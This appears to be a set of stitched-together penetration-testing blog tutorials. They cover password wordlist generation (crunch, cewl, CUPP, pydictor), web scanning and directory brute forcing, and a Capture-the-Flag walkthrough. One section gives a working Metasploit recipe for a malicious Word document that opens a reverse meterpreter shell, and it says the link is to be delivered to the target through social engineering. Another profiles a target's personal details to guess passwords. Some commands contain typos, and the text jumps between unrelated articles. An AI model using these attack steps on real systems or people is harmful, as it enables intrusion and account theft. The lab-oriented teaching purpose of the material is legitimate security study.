5 Ways to Create Dictionary for Bruteforcing

We live in digital era, and in the world of technology everything is password protected. There are many ways to crack the password such as social engineering, try and error method, etc. but the three only two most successful methods of password cracking i.e. Dictionary attack and Brute force. Both of them has there perks and disadvantages. And in today’s article we will focus on dictionary attack as it comes handy and is the best method to crack a password.

Dictionary attack: Dictionary attack is an attempted entry in a digital system which uses a precompiled list of possible passwords rather entering them one at a time. Basically, it an evolved and advanced form of trial and error as it brings result fast and is efficient. I am sure that there are many ways for a dictionary attack but I am going to give you five best ones.

The first is Crunch. The best thing about crunch is you can use it both offline and online. It generates wordlist according to your requirements. You can give maximum and minimum length of the password and also provide it with a character-set which you want it use while creating your dictionary. And then crunch will create you dictionary while keeping your requirements at its priority. Hence, a dictionary will be created with all the possible combinations.

Now let’s see how to use it. Observe its syntax first:

crunch -t -o

crunch àcrunch is the key word which notifies the system to use this tool.

à here you specify the minimum length characters you want.

àhere you specify maximum length of characters.

àhere you specify the characters you want it to use while creating the dictionary.

-t à this is optional but here you can specify pattern in with you want your character-set to be.

-o à here you give the path where you want your dictionary file to be saved.

For instance open the terminal of kali and type:

crunch 3 4 ignite –o /root/Desktop/dict.txt

Now the above command will create dictionary with the possible combinations from the word ignite which will length from 3 to 4 characters. The file will be saved in text form on the Desktop. Similar is shown in the image below:

Let’s now read dict.txt file and for that type:

cat dict.txt

All the words will be displayed the following manner:

Next way is by using Cewl. Now Cewl works somewhat like John The ripper and is written in ruby. When targeting people of corporate sector or business world; this is the tool for you. As you all know it is in human psyche to use the words significant to them and which occur in their day to day life. Cewl works on the URL you provide it. It will take that URL and crawl its way to the depth of 2 links (by default, you can increase or decrease the depth to) and will search every word which has the possibility of being a password. With all these words it will generate a wordlist for you to use as your dictionary in dictionary attack. Let’s observe it syntax:

·         cewl -d -w

·         Cewl à indicated the tool which is being used

·         à here give the URL that you want to use as a foundation of your dictionary.

·         -d à here, give the number of links you want it to go through while creating your dictionary.

·         -w à here, give the path where you want to store all the possible passwords.

·         For example in the terminal of kali type :

cewl www.ignitetechnologies.in –d 2 –w /root/Desktop/dict.txt

The above command will create a dictionary file using the word from the URL.

Let’s look the dictionary file it just created and for that type:

cat dict.txt

All the words will be displayed in following manner:

Our next way is using a third party tool i.e. cup. Previous tools were pre-installed but you will have to install this one on your own. To install it please type:

git clone https://github.com/Mebus/cupp.git

CUPP is developed in python and makes very personalized tool when it comes to password cracking. Studies show that while setting up password, humans show a similar pattern such as they tend make password personalize by adding their date of birth, anniversary date, pet’s name, etc. and CUPP focuses on this weakness and helps to crack password effectively. Before creating a wordlist, it will ask you required information about your target. And will create the wordlist as per the information. Now, let’s study how it works set-by-step. Initiate cupp first by typing:

./cupp.py –i

Once initiated it will ask you the information about your target as shown in the image:

Give the required information and your wordlist will be generated as follows:

Next up tool is Pydictor. This is a special tool as it is the only tool that creates the wordlist both in normal words and in base64 encryption. So if someone is smart enough to keep a safe password this tool will help you with it. Pydictor is written in python. There are two method to crack the password using this tool à one creates a normal wordlist the other creates wordlist in base64 form. We will try both the methods. But first things first, this is a third party tool so we will have to install it and for it please type :

git clone https://github.com/LandGrey/pydictor.git

Once the tool is installed and ready to use, give it instructions on bases of what you want it to generate the wordlist using. Understand the syntax first:

./pydictor.py –len -base d –o

·         ./pydictor.py à initiates the tool

·         --len à indicates the length of characters

·         à here, give minimum length of characters

·         à here, give  maximum length of characters

·         -o à indicates the path

·         à here, give path where you want your wordlist to be saved

Let’s give the command to generate the wordlist now:

./pydictor.py –len 5 5 –base d –o /root/Desktop/dict.txt

Let’s read the file created to have a look at the words that it has generated. And for that type:

cat dict.txt/BASE_5_5_d_071743.txt

The other method using the similar tool gives us password in base64 encoding. Let’s study the syntax first:

./pydictor.py –len -base d –encode –o

·         ./pydictor.py à initiates the tool

·         --len à indicates the length of characters

·         à here, give minimum length of characters

·         à here, give  maximum length of characters

·         --encode à indicated the type of encryption/encoding

·         à here, give the type of encoding you want

·         -o à indicates the path

·         à here, give path where you want your wordlist to be saved

Let’s give the command to generate wordlist:

./pydictor.py –len 5 5 –encode b64 –o /root/Desktop/dict.txt

The above command will generate wordlist in base64 let’s have a look at it:

cat dict.txt/BASE_5_5_d_070433.txt

The last and next up tool is Dymerge. Dymerge is interesting and powerful tool made in python. Basically what dymerge does is takes the previously made multiple dictionaries and merges them into a single one, so all the dictionaries can you use in one go while you sit back and relax. You can merge any number of dictionaries either default ones or custom made. This is again a third party tool so let’s install it first:

git clone https://github.com/k4m4/dymerge.git

Let’s understand its syntax:

python dymerge.py -s –o

·         Python dymerge.py à initiates the tool

·         à here, give path of the first dictionary you want to merge

·         à here, give path of the second dictionary you want to merge

·         -o à indicates the path where the resulted wordlist will be saved

·         à here, give the path where the final wordlist list will be saved

Now that we have understood the syntax let’s try the command:

python dymerge.py /root/Desktop/digit.txt /root/Desktop/words.txt –s –o /root/Desktop/dict.txt

Here, I have taken two wordlists (you can take more also), where one contains numbers and other contains alphabets and merges them into one so you can use multiple dictionaries at the same time.

Let’s have a look at the dictionary that it has created:

cat  dict-1.txt

Scan Website Vulnerability using Uniscan (Beginner Guide)

Through this article we are trying to elaborate the word Enumeration using Kali Linux tool UNISCAN.

Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner as well as work as enumerating tool in order to gather information like open ports and protocol related to target and investigate it against any vulnerability.

Let’s start!!!

Open the terminal and type following command using –j option for server fingerprints

uniscan -u http://testphp.vulnweb.com/listproducts.php?cat=1 -j

It will start enumeration from PING by sending icmp packets to targeted server and establish the connection.

Further it will use TRACEROUTE to show the path of a packet of information took from source to destination and list all the routers it travels through or fails to and is discarded. In actually, it will inform you how long each 'hop' from router to router takes.

NSLOOKUP is a program to query Internet domain name servers (DNS). NSLOOKUP or Reverse DNS (rDNS) is a method of resolving an IP address into a domain name

Uniscan made use of NMAP for aggressive scan against the targeted server to identify open ports and protocols services hence from screenshot you can observe the result.  It also enumerates the target using NMAP NSE script to identify the vulnerability and details of running services.

Now type following command for dynamic scan against the targeted server using –d option.

uniscan -u http://testphp.vulnweb.com/listproducts.php?cat=1 -d

 Now it will load the selected plug-in for fetching more details related to targeted server.

From given screenshot you can observe the result where it came up with an email id moreover loaded further plug-in for scanning vulnerability like sql injection, remote or local file inclusion and xss.

From given below screenshot you can see it has used blind sql injection and return a link of the targeted web pages. Similarly it will test for xss and remote or local file inclusion vulnerability.

Now type next command using –q option to enable directory test in targeted server

Uniscan –u http://192.168.1.1107 –q

Form scanning result you can read the fetched directories.

Last but not least use –g option for web fingerprints with following command

Uniscan –u http://192.168.1.1107 –g

Here we have come across available http option GET, HEAD, POST, OPTION, and TRACE which might help in verb tampering.

It will try to find out web service and error information and type of error as shown in given image.

Here this tool inserts a string in html in order to grab banner moreover we have come across the credential of web server and from given screenshot you can read login msfadmin: msfadmin

5 Ways to Directory Bruteforcing on Web Server

In this article we have focus towards directory brute force attack using Kali Linux tool and try to find hidden files and directories inside web server for penetration testing.

A path traversal attack also known as directory traversal aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (.../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. For more information visit owasp.org

Let’s Start!!!

DIRB

DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response. DIRB main purpose is to help in professional web application auditing.

The tool “Dirb” is in built in kali Linux therefore Open the terminal and type following command to start brute force directory attack.

Dirb http://192.168.1.5/dvwa

Hence you can see read the fetched directories and file in the given screenshot.

DirBuster

DirBuster is a multi-threaded java application designed to brute force directories and files names on web/application servers. DirBuster comes with total of 9 different lists; this makes DirBuster extremely effective at finding those hidden files and directories.

Similarly open the terminal and type Dirbuster, then enter the target URL as shown in below image and browse /usr/share/dirbuster/wordlis/ directory-list-2-3-medium.txt for brute force attack.

Select option dir to start with /dvwa, once you have configured the tool for attack click on start.

This will start the brute force attack and dumps all file and directory present inside web server as shown in given screenshot.

Wfuzz

Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc.

wfuzz -c -W /usr/share/wfuzz/wordlist/dir/common.txt --hc 400,404,403 http://192.168.1.5/dvwa/FUZZ

Here option –c is use for output with color; -W for wordlist; --hc for hide responses with the specified code/lines/words/chars. It is also in-built in your kali Linux.

Metasploit

HTTP Directory Scanner

This module identifies the existence of interesting directories in a given directory path.

use auxiliary/scanner/http/dir_scanner   

 msf auxiliary(dir_scanner) >set  /usr/share/wfuzz/wordlist/dirb/common.txt

msf auxiliary(dir_scanner) >set rhosts 192.168.1.5

msf auxiliary(dir_scanner) > set path /dvwa

msf auxiliary(dir_scanner) >exploit

Dirsearch

Dirsearch is a simple command line tool designed to brute force directories and files in websites. This tool is available at gith

ub you can download it from there and after installation in your kali Linux type following to start dirsearch. 

./dirsearch.py –u http://192.18.1.5/dvwa -e php -f -x 400,403,404

Here option –e is use for generating one entry for php extension; -x hide responses with the specified code/lines/words/chars.

From given screenshot you can read php file of the targeted web server.

Exploit Remote PC using Microsoft Office Word Malicious Hta Execution

For Kali Linux users we had perform this attack through metasploit without using any python script which generates .rtf file for attack, thus the user only need to update their kali Linux and load metasploit framework to start this attack. This is a zero –day exploit that has excellent rating against Ms-office vulnerability which can be very easily used to shoot any targeted windows system.

Attacker: Kali Linux

Target: MS Office

Let’s breach!!

msfconsole

This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.

Object Linking and Embedding Based on Component Object Model (COM) provides the majority of compatibility on Office, Working with default/third-party applications to provide rich documentation features to Office users.

Use exploit/windows/fileformat/office_word_hta

Msf > exploit (office_word_hta) >set srvhost 192.168.1.8

Msf > exploit (office_word_hta) >set paylod windows/meterpreter/revrese_tcp

Msf > exploit (office_word_hta) >set filename sale.doc

Msf > exploit (office_word_hta) >set lhost 192.168.1.8

Msf > exploit (office_word_hta) >exploit

 This module will automatically generate a malicious .rtf file inside /root/.msf4/local/sales.doc moreover it will generate a link and that link must be share to target using social engineering method.

When the user will open that link and make double click (OLE event) on .hta file, the attacker will received meterpreter sesssion in metasploit framewok.

Meterpreter > sysinfo

Hack the Defense CTF (CTF Challenge)

Defence VM is made by Silex Secure team. This VM is designed to honor and pay respects to the military of Nigeria and the soldiers who stood up against the terrorist attack. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. You can download it from àhttps://www.vulnhub.com/entry/defence-space-ctf-2017,179/

Are you ready for the challenge soldier? First step to attack is to identify the target. So, identify your target. To identify the target we will use the following command:

netdiscover

Now that you have identify your target (mine is 192.168.1.17) you will need to acquire it and declare you victory.  In order to acquire it we will need a plan to enter our enemy. To let us search for all the doors, closed or not. And for that let’s fire up the nmap.

nmap  -p- -A 192.168.1.17

Our search has led us to the result that Port nos. 21, 80,443, 2225 is open with the services of FTP, HTTP, HTTPS, SSH respectively. As the port 80 is open we can open our target IP in the browser.

But there is no hint or what-so-ever in there. But as this based on military aspects the hint could be camouflaged. Therefore let’s check the source code.

And yes!! We have found the flag 0 although it is coded base64. Upon decoding it will become netdiscover.

As the source is unknown territory, I inspected more and found that there was a directory which proved to be very useful : assests/lafiya.js

Open the said directory in browser and check it source code. In the source code you will find flag 1 which will be in hex.

Upon converting hex you will uncover flag 2 in an MD5 form.

When you convert MD5 value to its original, it will be nmap as shown in the image below.

The second flag was nmap that means there is something the nmap that we missed. And upon reviewing it I remembered that SSH service was open on the port 2225. And so I accessed it with the following command.

ssh 192.168.1.17 –p 2225

And there we have it our flag 2B in an MD5 value. Let’s convert it.

Our flag 2B is encrypt. That means there is something related to encryption and security. Now the best way to provide security to a website is through it security certificate. Let’s check it out.

Now, upon examining the certificate, you will find your third flag and a hint i.e [39 39 30].

Firstly, decode the flag which will be unit.

The combination of 3, 9, 0 will be the suffix of the word unit. But there are a lot of combination foe it so let’s create those combinations with the help of crunch with command:

crunch 3 3 390

We will get 27 possible combinations and so make a text file for dictionary attack and add the word ‘unit’ as a prefix to every combination. Now let’s use dirb to find anything related to unit and these combinations.

dirb http://192.168.1.17 /rot/Desktop/dict.txt

To our joy there is a directory that goes by unit990. Let’s open it in our browser without further delay.

We do not have credentials for logging in. So, I checked it source code instead. In the source code you will find flag 4 in a base64 code.

Decode the flag and you will get admin.php

Opening the previously found directory in the browser will show the same page but its source code is edited. As you will check it, you will find that flag 5 again in base64 code.

By decoding flag 5 you will get SQL injection. That means next step should be SQL injection.

Now this hint is just to throw us of our track. I used every SQL injection technique I could find but it didn’t help. So I used dirb on the target.

dirb http://192.168.1.17

I found a directory called assets. And opened it in the browser and found the 7^th flag.

Now try and decode it widgets.

Now you can try and decode it but it’s hopeless to decode it anywhere online. So examined the dirb result more and found another directory called phpmyadmin

If you open this directory in browser you will find a log in page. I used the top 10 most commonly used password and username i.e root and root and got in. In the database I found a silex table. Now silex is the team’s name so I guess this is most important table.

Upon checking it, I found admin and in admin there was our 6^th flag coded in base64

Upon decoding, it says Nigiarforcecloud.

And voila!! All our flags are uncovered. Good work soldiers. Solving this VM was good exercise and I salute the fallen Nigerian soldiers and wish them peace and praise the whole army.